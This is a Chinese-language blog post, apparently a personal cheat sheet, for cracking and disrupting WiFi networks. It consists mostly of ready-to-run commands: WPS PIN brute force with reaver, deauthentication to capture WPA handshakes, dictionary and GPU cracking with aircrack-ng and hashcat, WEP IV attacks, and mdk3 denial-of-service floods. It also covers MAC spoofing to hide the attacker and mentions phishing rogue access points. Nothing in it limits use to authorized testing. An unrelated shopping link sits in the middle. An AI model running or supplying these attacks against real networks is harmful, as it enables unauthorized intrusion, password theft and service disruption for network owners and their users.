WiFi Cracking
ssooking Lv5

网卡模式

无线网卡开启监听模式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up

# airmon-ng会自动把网卡切换到监听模式
airmon-ng start wlan0 => wlan0mon

#如果不成功,试试:
airmon-ng check kill
airmon-ng start wlan0

#附:有线网卡开启混杂模式
ifconfig eth0 promisc #设置网卡为混杂模式
ifconfig eth0 -promisc #从混杂模式中恢复

从监听模式中恢复

1
2
3
ifconfig wlan0 down
iwconfig wlan0 mode managed
ifconfig wlan0 up

重启网卡

1
2
3
4
service network-manager restart
/etc/init.d/network-manager restart
sudo systemctl restart NetworkManager
service networking restart

保护措施

1
2
3
4
5
6
7
8
9
10
11
# 伪装MAC地址
macchanger -s [网卡]           #查看网卡当前的MAC
macchanger -m 想伪造的MAC地址 网卡    #伪造MAC地址
macchanger -A wlan0      #修改网卡mac地址为随机地址


#修改主机名
vi /etc/hostname

#本机防ping
echo 1 >/proc/sys/net/ipv4/icmp_echo_ignore_all

拓展坞飞利浦macbook type-c扩展坞 八合一京东https://item.m.jd.com/product/41639596994.html?wxa_abtest=a&gx=RnFlkTRQPmGKydRP--txW6oz50_h_tjGa2Z0&ad_od=share&utm_source=androidapp&utm_medium=appshare&utm_campaign=t_335139774&utm_term=Wxfriends八合一2993

Wifi破解

WPS破解(Pin码)

1、无线网卡开启监听模式

2、扫描开启wps功能的无线AP

1
wash -i wlan0

这里需要强调一下,网上很多教程里都有-C这个优化参数,当初写这篇博文的时候也有这个参数,不过新版本的wash已经不再支持,感谢Demon先生的友情提醒。

3、破解ping码

1
2
3
4
5
reaver -i 混杂网卡名 -c 信道 -b AP'MAC -a -S -vv -d 9 -t 9 (混杂模式使用)

目标信号很好: reaver -i wlan0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i wlan0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i wlan0 -b MAC -a -S -vv -d5 -c 1

4、成功破解出PIN码后,通过PIN码直接获取路由器密码

1
reaver -i 混杂网卡名 -b MAC -p PIN码

密码字典爆破

WPA/WPA2

Aircrack-ng

1、无线网卡开启混杂监听模式

2、扫描WiFi网络

1
airodump-ng wlan0mon

3、启动监听等待抓取握手包

1
2
3
4
airodump-ng -c 信道 -w 保存的数据包名 [–-bssid AP’MAC] wlan0mon

#Eg:
airodump-ng -c 6 --bssid 69:71:5E:51:38:EE -w /home/ssooking/wifi/FAST_33687 wlan0mon

4、解除客户端认证抓取握手包

1
2
3
4
5
6
7
8
9
10
11
aireplay-ng  -0 攻击次数 -a AP’MAC  [-c 客户端MAC]  [-e bssid]  wlan0mon [--ignore-negative-one

# Eg:
aireplay-ng -0 10 -a 69:71:5E:51:38:EE -c 78:AF:8E:7D:8A:9D wlan0mon

# 如果扫描的信道有-1,则需要--ignore-negative-one参数
aireplay-ng -0 10 -a 69:71:5E:51:38:EE -c 78:AF:8E:7D:8A:9D wlan0mon --ignore-negative-one

# 在没有客户端连接的情况下,可使用假身份认证攻击(模拟用户认证连接,攻击这个模拟用户)
aireplay-ng --fakeauth -q 10 -a AP'MAC -h 模拟用户的MAC
aireplay-ng --arpreplay -b AP'MAC -h 模拟用户的MACs

5、使用aircrack-ng加载字典破解密码

1
2
3
4
5
6
aircrack-ng 数据包名.cap –w 字典路径
airdecap-ng -l -e bssid –p 密码数据包名.cap #破解出密码后,解析加密内容

wpaclean out.cap in.cap             //整理包文件内容,保证它的格式内容与密码破解程序兼容
aircrack-ng out.cap -J out.hccap       //要把cap数据包转换成hccap数据包才能用oclHashcat破解
cudaHashcat-plus64.exe -m 2500 out.hccap  //破解WPAv2哈希

数据包处理

1
2
3
4
5
6
7
8
9
10
11
12
13
# airgraph-ng
airgraph-ng -i filename.csv -g CAPR -o outputfilename.png
eog outputfilename.png
airgraph-ng -i filename.csv -g CPG -o outputfilename.png
eog outputfilename.png

# airdecap-ng
airdecap-ng -b (vic ap) outputfilename.cap
wireshark outputfilename.cap
airdecap-ng -w (WEP KEY) (capturefile.cap)
wireshark capturefile-DEC.cap
airdecap-ng -e (ESSID VIC) -p (WPA PASSWORD) (capturefile.cap)
wireshark capturefile-dec.cap

WEP

1、无线网卡开启混杂监听模式

2、扫描WiFi网络

1
airodump-ng wlan0mon

3、启动监听等待抓取ivs数据包

1
2
3
4
airodump-ng  -c 信道 -w 保存的数据包名 [–-bssid AP’MAC] --ivs wlan0mon

#Eg:
airodump-ng -c 6 --bssid 69:71:5E:51:38:EE -w /home/ssooking/wifi/FAST_33687 wlan0mon

4、解除客户端认证抓取ivs数据包

1
aireplay-ng -3 -b AP’MAC -h 客户端MAC  [-x 1024(每秒发包数量)] wlan0mon0

注意:为了便于破解密码,所需的ivs数量建议20000以上

5、使用aircrack-ng加载字典破解密码

1
2
aircrack-ng 数据包名.ivs –w 字典路径 
aircrack-ng -x -f 2 包名.ivs -x 暴力破解 #-f 2 复杂度为2
1
2
3
4
5
6
7
8
9
10
airdecap-ng  –w 解密前的秘钥 数据包名.ivs
如:KEY FOUND! [31:32:33:34:35:36:37:38:39:30:61:61:61] (ASCII:1234560aaa) //蓝色部分是解密前的密钥

wesside –v AP’MAC –k 1(重发数据包次数) –i mon0 //aircrack-ng套件中的自动化破解weo加密wifi工具,但成功率较低
tkiptun-ng –a AP’MAC -h 客户端MAC 网卡   //aircrack-ng套件中的自动化破解wpa/wpa2加密wifi的工具(可加参数:-m 最小数据包长度 -n 最大数据包长度)

辅助命令
airdecloack-ng --bssid AP’MAC --filters signal –i 包名.cap #过滤出指定AP报文数据(会生成*.pcap的报文)
ivstools --convert a.cap b.ivs //将cap数据包转换成ivs数据包
ivstools --merge a.ivs b.ivs ab.ivs //将数据包过滤合并

其他破解工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
握手包破解命令 
john --wordlist=password.lst --rules --stdout | aircrack-ng -e essid -w - xxx.cap
使用john在字典上执行排列匹配,将各种组合词提供给aircrack-ng破解使用

pyrit -r xxx.cap -i password.lst attack_passthrough GPU加速破解 (time 程序/命令名 #计算程序执行时间)

cowpatty -s ESSID -r xxx.cap -d /path/彩虹表路径 (若SSID中包含空格,要用引号)

为cowpatty破解制作专用hash tables :
  genpmk -f 字典 -d 要生成的hash table -s ssid
很多组织都自己建立了wpa table库,也就是预先使用常见的essid生成hash table
如果要破解essid相同的无线密码,直接网上下载,无需自己再生成
国内比较有名的就是ZerOne团队针对国内常见essid生成的hash table

现在有很多调用aircrack-ng套件自动化抓包破解的项目,可以去github上瞧瞧。

在线破解握手包的站点 https://gpuhash.me/

wifite

wifite是一个命令行自动化WiFi破解工具,它会根据目标路由器,自动选择合适的破解方式,比如PIN码破解,抓包暴力破解等。

1、无线网卡开启监听模式

2、启动wifite

1
sudo wifite

钓鱼欺骗获取密码

通过构建钓鱼WiFi,攻击正常客户端迫使其下线,连接恶意AP,欺骗目标用户舒服密码。

WiFi DOS

1
2
3
4
5
aireplay-ng -0 3 –a BSSID –c clientMAC wlan0 
mdk3 mon0 a –a AP'MAC -s 80
mdk3 mon0 d -c 信道 #攻击client MAC
mdk3 mon0 b –g –c 11 –h 7     #发动虚假AP信号进行干扰
mdk3 mon0 b –n ESSID –g –c 11  #对指定名称(ESSID)发送干扰,-g是伪装为54M的标准的802.11无线网络,-c频道
  • Post title:WiFi Cracking
  • Post author:ssooking
  • Create time:2020-01-25 13:19:00
  • Post link:https://ssooking.github.io/2020/01/wifi-cracking/
  • Copyright Notice:All articles in this blog are licensed under BY-NC-SA unless stating additionally.